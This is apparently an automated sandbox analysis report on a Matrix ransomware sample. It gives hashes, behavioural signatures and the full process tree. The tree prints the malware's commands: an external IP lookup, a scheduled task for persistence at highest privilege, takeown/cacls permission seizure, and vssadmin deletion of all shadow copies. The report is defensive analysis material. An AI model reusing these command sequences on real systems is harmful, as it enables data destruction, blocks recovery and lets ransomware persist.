Analysis

  • max time kernel
    163s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    01-02-2022 08:39

General

  • Target

    FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe

  • Size

    1.2MB

  • MD5

    76b640aa00354e46b29ca7ac2adfd732

  • SHA1

    afebf9d72ba7186afefebf4deda87675621b0b8b

  • SHA256

    0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7

  • SHA512

    fecb15238714c786098f1dd0bb18696ab15634228ec3a48c900fd843e817d4c24607bdf6fb58e0321da3e1c1e49305ec919dddabbd34727acec8fbd6cb6fd552

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://myexternalip.com/raw

Signatures

  • Matrix Ransomware 64 IoCs

    Targeted ransomware with information collection and encryption functionality.

  • suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity

    suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Blocklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Sets service image path in registry 2 TTPs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
    "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe"
    1⤵
    • Matrix Ransomware
    • Loads dropped DLL
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:1736
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWlAsQ0H.exe"
      2⤵
        PID:1752
      • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWlAsQ0H.exe
        "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWlAsQ0H.exe" -n
        2⤵
        • Executes dropped EXE
        PID:1132
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K73dccXq.txt"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1068
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:888
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\kqDKmwP5.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1592
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\kqDKmwP5.bmp" /f
          3⤵
          • Sets desktop wallpaper using registry
          PID:668
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
          3⤵
            PID:1064
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
            3⤵
              PID:1728
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\QeOC2pbw.vbs"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1364
            • C:\Windows\SysWOW64\wscript.exe
              wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\QeOC2pbw.vbs"
              3⤵
                PID:1916
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\wT305Pzq.bat" /sc minute /mo 5 /RL HIGHEST /F
                  4⤵
                    PID:1724
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\wT305Pzq.bat" /sc minute /mo 5 /RL HIGHEST /F
                      5⤵
                      • Creates scheduled task(s)
                      PID:1228
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
                    4⤵
                      PID:1716
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /Run /I /tn DSHCA
                        5⤵
                          PID:1168
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\e9EhWF6F.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1816
                    • C:\Windows\SysWOW64\attrib.exe
                      attrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"
                      3⤵
                      • Views/modifies file attributes
                      PID:1080
                    • C:\Windows\SysWOW64\cacls.exe
                      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C
                      3⤵
                        PID:1660
                      • C:\Windows\SysWOW64\takeown.exe
                        takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"
                        3⤵
                        • Modifies file permissions
                        PID:1808
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c x7CWUbd8.exe -accepteula "ENUtxt.pdf" -nobanner
                        3⤵
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:1708
                        • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x7CWUbd8.exe
                          x7CWUbd8.exe -accepteula "ENUtxt.pdf" -nobanner
                          4⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:832
                          • C:\Users\Admin\AppData\Local\Temp\x7CWUbd864.exe
                            x7CWUbd8.exe -accepteula "ENUtxt.pdf" -nobanner
                            5⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Enumerates connected drives
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious behavior: LoadsDriver
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1252
                  • C:\Windows\system32\taskeng.exe
                    taskeng.exe {EFC26F6A-0ECD-41A0-ADD4-B0D63C06595B} S-1-5-21-3846991908-3261386348-1409841751-1000:VQVVOAJK\Admin:Interactive:[1]
                    1⤵
                      PID:1568
                      • C:\Windows\SYSTEM32\cmd.exe
                        C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\wT305Pzq.bat"
                        2⤵
                          PID:2044
                          • C:\Windows\system32\vssadmin.exe
                            vssadmin Delete Shadows /All /Quiet
                            3⤵
                            • Interacts with shadow copies
                            PID:1068
                      • C:\Windows\system32\vssvc.exe
                        C:\Windows\system32\vssvc.exe
                        1⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:572

                      Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • memory/888-63-0x00000000023C0000-0x000000000300A000-memory.dmp

                        Filesize

                        12.3MB

                      • memory/888-62-0x00000000023C0000-0x000000000300A000-memory.dmp

                        Filesize

                        12.3MB

                      • memory/888-61-0x00000000023C0000-0x000000000300A000-memory.dmp

                        Filesize

                        12.3MB

                      • memory/1736-54-0x0000000076911000-0x0000000076913000-memory.dmp

                        Filesize

                        8KB